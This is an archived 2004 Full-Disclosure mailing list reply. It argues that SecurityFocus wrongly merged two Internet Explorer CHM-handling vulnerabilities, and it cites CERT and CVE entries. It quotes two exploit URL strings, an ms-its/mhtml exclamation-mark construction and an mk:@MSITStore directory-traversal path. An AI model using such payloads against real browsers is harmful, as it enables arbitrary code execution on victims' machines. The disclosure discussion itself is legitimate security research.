[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] IE exploit going around on irc
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: Re: [Full-Disclosure] IE exploit going around on irc
- From: "Lise Moorveld" <lise_moorveld@xxxxxxxxxxx>
- Date: Wed, 07 Apr 2004 15:39:07 +0200
Hello,
What I find interesting is that SecurityFocus links the "IE ms-its: and
mk:@MSITStore: vulnerability" paper by Roozbeh Afrasiabi (
http://www.securityfocus.com/archive/1/358913 ) to the "Microsoft Internet
Explorer Unspecified CHM File Processing Arbitrary Code Execution
Vulnerability (bid 9658)" posting by K-otic (
http://www.securityfocus.com/archive/1/354447 ).
They do this in BID 9658 ( http://www.securityfocus.com/bid/9658 ).
I think SecurityFocus got this wrong...
The issue referred to by K-otic is the exploit where you use a non-existant
mht file and an exclamation mark like so:
ms-its:mhtml:file://c:\yada.mhtml!http://www.example.com/compiledhelpfile.chm:/htmlfile.html
also described in Cert advisory VU#323070 (
http://www.kb.cert.org/vuls/id/323070 )
and CVE ID: CAN-2004-0380
... Roozbeh Afrasiabi doesn't use this construction anywhere in his paper...
what he DOES use, however (amongst others), is the directory-traversal
style thingy:
mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\program
files\\winamp\\skins\\x.wsz::\winamp.htm
Now, I don't claim to fully grasp the Roozbeh paper either, but he does make
a reference to Arman Nayyeri, and what I think is the following post: "IE
5.x-6.0 allows executing arbitrary programs using showHelp()" (
http://archives.neohapsis.com/archives/bugtraq/2003-12/0337.html )
Oh, and Nayyeri claims Jelmer helped him with this, so Jelmer might be able
to shed some light :)
To return to this thread, the original posting by Niek Baakman mentions the
exclamation mark issue
http://archives.neohapsis.com/archives/fulldisclosure/2004-03/1726.html
And in a reply, Thor refers to the directory traversal-style issue (or at
least the Roozbeh paper):
http://archives.neohapsis.com/archives/fulldisclosure/2004-03/1785.html
Anyway, do you guys think I'm right in thinking these are seperate issues?
Bye,
Lise
_________________________________________________________________
Limited-time offer: Fast, reliable MSN 9 Dial-up Internet access FREE for 2
months!
http://join.msn.com/?page=dept/dialup&pgmarket=en-us&ST=1/go/onm00200361ave/direct/01/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html